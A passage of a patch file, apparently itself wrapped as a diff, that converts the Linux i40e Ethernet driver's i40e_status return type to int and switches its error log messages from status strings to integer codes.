+ #endif /* CONFIG_I40E_DCB */
+@@ -10098,9 +10097,9 @@ static void i40e_clean_adminq_subtask(struct i40e_pf *pf)
+ 	struct i40e_arq_event_info event;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	u16 pending, i = 0;
+-	i40e_status ret;
+ 	u16 opcode;
+ 	u32 oldval;
++	int ret;
+ 	u32 val;
+ 
+ 	/* Do not run clean AQ when PF reset fails */
+@@ -10264,8 +10263,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10276,8 +10275,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10300,8 +10299,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10312,8 +10311,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10457,8 +10456,8 @@ static int i40e_get_capabilities(struct i40e_pf *pf,
+ 			buf_len = data_size;
+ 		} else if (pf->hw.aq.asq_last_status != I40E_AQ_RC_OK || err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "capability discovery failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "capability discovery failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENODEV;
+@@ -10579,7 +10578,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 	struct i40e_cloud_filter *cfilter;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct hlist_node *node;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Add cloud filters back if they exist */
+ 	hlist_for_each_entry_safe(cfilter, node, &pf->cloud_filter_list,
+@@ -10595,8 +10594,8 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 
+ 		if (ret) {
+ 			dev_dbg(&pf->pdev->dev,
+-				"Failed to rebuild cloud filter, err %s aq_err %s\n",
+-				i40e_stat_str(&pf->hw, ret),
++				"Failed to rebuild cloud filter, err %d aq_err %s\n",
++				ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -10614,7 +10613,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ static int i40e_rebuild_channels(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_channel *ch, *ch_tmp;
+-	i40e_status ret;
++	int ret;
+ 
+ 	if (list_empty(&vsi->ch_list))
+ 		return 0;
+@@ -10690,7 +10689,7 @@ static void i40e_clean_xps_state(struct i40e_vsi *vsi)
+ static void i40e_prep_for_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 v;
+ 
+ 	clear_bit(__I40E_RESET_INTR_RECEIVED, pf->state);
+@@ -10795,7 +10794,7 @@ static void i40e_get_oem_version(struct i40e_hw *hw)
+ static int i40e_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	if (ret) {
+@@ -10820,7 +10819,7 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	const bool is_recovery_mode_reported = i40e_check_recovery_mode(pf);
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 	u32 val;
+ 	int v;
+ 
+@@ -10836,8 +10835,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	/* rebuild the basics for the AdminQ, HMC, and initial HW switch */
+ 	ret = i40e_init_adminq(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto clear_recovery;
+ 	}
+@@ -10948,8 +10947,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (ret)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Rebuild the VSIs and VEBs that existed before reset.
+@@ -11052,8 +11051,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 		msleep(75);
+ 		ret = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (ret)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -11084,9 +11083,9 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	ret = i40e_set_promiscuous(pf, pf->cur_promisc);
+ 	if (ret)
+ 		dev_warn(&pf->pdev->dev,
+-			 "Failed to restore promiscuous setting: %s, err %s aq_err %s\n",
++			 "Failed to restore promiscuous setting: %s, err %d aq_err %s\n",
+ 			 pf->cur_promisc ? "on" : "off",
+-			 i40e_stat_str(&pf->hw, ret),
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	i40e_reset_all_vfs(pf, true);
+@@ -12220,8 +12219,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 			(struct i40e_aqc_get_set_rss_key_data *)seed);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12234,8 +12233,8 @@ static int i40e_get_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_get_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot get RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Cannot get RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -12510,11 +12509,11 @@ int i40e_reconfig_rss_queues(struct i40e_pf *pf, int queue_count)
+  * i40e_get_partition_bw_setting - Retrieve BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
++int i40e_get_partition_bw_setting(struct i40e_pf *pf)
+ {
+-	i40e_status status;
+ 	bool min_valid, max_valid;
+ 	u32 max_bw, min_bw;
++	int status;
+ 
+ 	status = i40e_read_bw_from_alt_ram(&pf->hw, &max_bw, &min_bw,
+ 					   &min_valid, &max_valid);
+@@ -12533,10 +12532,10 @@ i40e_status i40e_get_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_set_partition_bw_setting - Set BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
++int i40e_set_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	struct i40e_aqc_configure_partition_bw_data bw_data;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+ 
+@@ -12555,12 +12554,12 @@ i40e_status i40e_set_partition_bw_setting(struct i40e_pf *pf)
+  * i40e_commit_partition_bw_setting - Commit BW settings for this PF partition
+  * @pf: board private structure
+  **/
+-i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
++int i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ {
+ 	/* Commit temporary BW setting to permanent NVM image */
+ 	enum i40e_admin_queue_err last_aq_status;
+-	i40e_status ret;
+ 	u16 nvm_word;
++	int ret;
+ 
+ 	if (pf->hw.partition_id != 1) {
+ 		dev_info(&pf->pdev->dev,
+@@ -12575,8 +12574,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for read access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for read access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12592,8 +12591,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "NVM read error, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "NVM read error, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12606,8 +12605,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for write access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for write access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12626,8 +12625,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret)
+ 		dev_info(&pf->pdev->dev,
+-			 "BW settings NOT SAVED, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "BW settings NOT SAVED, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ bw_commit_out:
+ 
+@@ -12648,7 +12647,7 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ #define I40E_LINK_BEHAVIOR_WORD_LENGTH		0x1
+ #define I40E_LINK_BEHAVIOR_OS_FORCED_ENABLED	BIT(0)
+ #define I40E_LINK_BEHAVIOR_PORT_BIT_LENGTH	4
+-	i40e_status read_status = I40E_SUCCESS;
++	int read_status = I40E_SUCCESS;
+ 	u16 sr_emp_sr_settings_ptr = 0;
+ 	u16 features_enable = 0;
+ 	u16 link_behavior = 0;
+@@ -12681,8 +12680,8 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ 
+ err_nvm:
+ 	dev_warn(&pf->pdev->dev,
+-		 "total-port-shutdown feature is off due to read nvm error: %s\n",
+-		 i40e_stat_str(&pf->hw, read_status));
++		 "total-port-shutdown feature is off due to read nvm error: %d\n",
++		 read_status);
+ 	return ret;
+ }
+ 
+@@ -13001,7 +13000,7 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+ 	u8 type, filter_index;
+-	i40e_status ret;
++	int ret;
+ 
+ 	type = ti->type == UDP_TUNNEL_TYPE_VXLAN ? I40E_AQC_TUNNEL_TYPE_VXLAN :
+ 						   I40E_AQC_TUNNEL_TYPE_NGE;
+@@ -13009,8 +13008,8 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	ret = i40e_aq_add_udp_tunnel(hw, ntohs(ti->port), type, &filter_index,
+ 				     NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "add UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "add UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13025,12 +13024,12 @@ static int i40e_udp_tunnel_unset_port(struct net_device *netdev,
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_aq_del_udp_tunnel(hw, ti->hw_priv, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "delete UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "delete UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13919,8 +13918,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't get PF vsi config, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't get PF vsi config, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENOENT;
+@@ -13949,8 +13948,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						     pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13969,8 +13968,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13992,9 +13991,9 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 				 * message and continue
+ 				 */
+ 				dev_info(&pf->pdev->dev,
+-					 "failed to configure TCs for main VSI tc_map 0x%08x, err %s aq_err %s\n",
++					 "failed to configure TCs for main VSI tc_map 0x%08x, err %d aq_err %s\n",
+ 					 enabled_tc,
+-					 i40e_stat_str(&pf->hw, ret),
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 			}
+@@ -14088,8 +14087,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 		if (ret) {
+ 			dev_info(&vsi->back->pdev->dev,
+-				 "add vsi failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "add vsi failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			ret = -ENOENT;
+@@ -14120,8 +14119,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* VSI is already added so not tearing that up */
+ 		ret = 0;
+@@ -14567,8 +14566,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						  &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14577,8 +14576,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						   &ets_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw ets config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw ets config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14774,8 +14773,8 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 	/* get a VEB from the hardware */
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't add VEB, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't add VEB, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+@@ -14785,16 +14784,16 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 					 &veb->stats_idx, NULL, NULL, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB statistics idx, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB statistics idx, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		i40e_aq_delete_element(&pf->hw, veb->seid, NULL);
+ 		return -ENOENT;
+@@ -15004,8 +15003,8 @@ int i40e_fetch_switch_configuration(struct i40e_pf *pf, bool printconfig)
+ 						&next_seid, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "get switch config failed err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "get switch config failed err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			kfree(aq_buf);
+@@ -15050,8 +15049,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 	ret = i40e_fetch_switch_configuration(pf, false);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't fetch switch config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't fetch switch config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -15077,8 +15076,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 						NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -15415,13 +15414,12 @@ static bool i40e_check_recovery_mode(struct i40e_pf *pf)
+  *
+  * Return 0 on success, negative on failure.
+  **/
+-static i40e_status i40e_pf_loop_reset(struct i40e_pf *pf)
++static int i40e_pf_loop_reset(struct i40e_pf *pf)
+ {
+ 	/* wait max 10 seconds for PF reset to succeed */
+ 	const unsigned long time_end = jiffies + 10 * HZ;
+-
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	while (ret != I40E_SUCCESS && time_before(jiffies, time_end)) {
+@@ -15467,9 +15465,9 @@ static bool i40e_check_fw_empr(struct i40e_pf *pf)
+  * Return 0 if NIC is healthy or negative value when there are issues
+  * with resets
+  **/
+-static i40e_status i40e_handle_resets(struct i40e_pf *pf)
++static int i40e_handle_resets(struct i40e_pf *pf)
+ {
+-	const i40e_status pfr = i40e_pf_loop_reset(pf);
++	const int pfr = i40e_pf_loop_reset(pf);
+ 	const bool is_empr = i40e_check_fw_empr(pf);
+ 
+ 	if (is_empr || pfr != I40E_SUCCESS)
+@@ -15608,13 +15606,15 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ #ifdef CONFIG_I40E_DCB
+ 	enum i40e_get_fw_lldp_status_resp lldp_status;
+-	i40e_status status;
+ #endif /* CONFIG_I40E_DCB */
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	static u16 pfs_found;
+ 	u16 wol_nvm_bits;
+ 	u16 link_status;
++#ifdef CONFIG_I40E_DCB
++	int status;
++#endif /* CONFIG_I40E_DCB */
+ 	int err;
+ 	u32 val;
+ 	u32 i;
+@@ -15983,8 +15983,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (err)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Reconfigure hardware for allowing smaller MSS in the case
+@@ -16002,8 +16002,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		msleep(75);
+ 		err = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (err)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -16135,8 +16135,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the requested speeds from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, false, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	pf->hw.phy.link_info.requested_speeds = abilities.link_speed;
+ 
+@@ -16146,8 +16146,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the supported phy types from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, true, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* make sure the MFS hasn't been set lower than the default */
+@@ -16218,7 +16218,7 @@ static void i40e_remove(struct pci_dev *pdev)
+ {
+ 	struct i40e_pf *pf = pci_get_drvdata(pdev);
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret_code;
++	int ret_code;
+ 	int i;
+ 
+ 	i40e_dbg_pf_exit(pf);
+@@ -16466,9 +16466,9 @@ static void i40e_pci_error_resume(struct pci_dev *pdev)
+ static void i40e_enable_mc_magic_wake(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u8 mac_addr[6];
+ 	u16 flags = 0;
++	int ret;
+ 
+ 	/* Get current MAC address in case it's an LAA */
+ 	if (pf->vsi[pf->lan_vsi] && pf->vsi[pf->lan_vsi]->netdev) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 3a38bf8bcde7e..17e3f26eee4a4 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -13,10 +13,10 @@
+  * in this file) as an equivalent of the FLASH part mapped into the SR.
+  * We are accessing FLASH always thru the Shadow RAM.
+  **/
+-i40e_status i40e_init_nvm(struct i40e_hw *hw)
++int i40e_init_nvm(struct i40e_hw *hw)
+ {
+ 	struct i40e_nvm_info *nvm = &hw->nvm;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 fla, gens;
+ 	u8 sr_size;
+ 
+@@ -52,12 +52,12 @@ i40e_status i40e_init_nvm(struct i40e_hw *hw)
+  * This function will request NVM ownership for reading
+  * via the proper Admin Command.
+  **/
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				       enum i40e_aq_resource_access_type access)
++int i40e_acquire_nvm(struct i40e_hw *hw,
++		     enum i40e_aq_resource_access_type access)
+ {
+-	i40e_status ret_code = 0;
+ 	u64 gtime, timeout;
+ 	u64 time_left = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+ 		goto i40e_i40e_acquire_nvm_exit;
+@@ -111,7 +111,7 @@ i40e_i40e_acquire_nvm_exit:
+  **/
+ void i40e_release_nvm(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_SUCCESS;
++	int ret_code = I40E_SUCCESS;
+ 	u32 total_delay = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+@@ -138,9 +138,9 @@ void i40e_release_nvm(struct i40e_hw *hw)
+  *
+  * Polls the SRCTL Shadow RAM register done bit.
+  **/
+-static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
++static int i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 srctl, wait_cnt;
+ 
+ 	/* Poll the I40E_GLNVM_SRCTL until the done bit is set */
+@@ -165,10 +165,10 @@ static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+  *
+  * Reads one 16 bit word from the Shadow RAM using the GLNVM_SRCTL register.
+  **/
+-static i40e_status i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
+-					    u16 *data)
++static int i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
++				    u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 sr_reg;
+ 
+ 	if (offset >= hw->nvm.sr_size) {
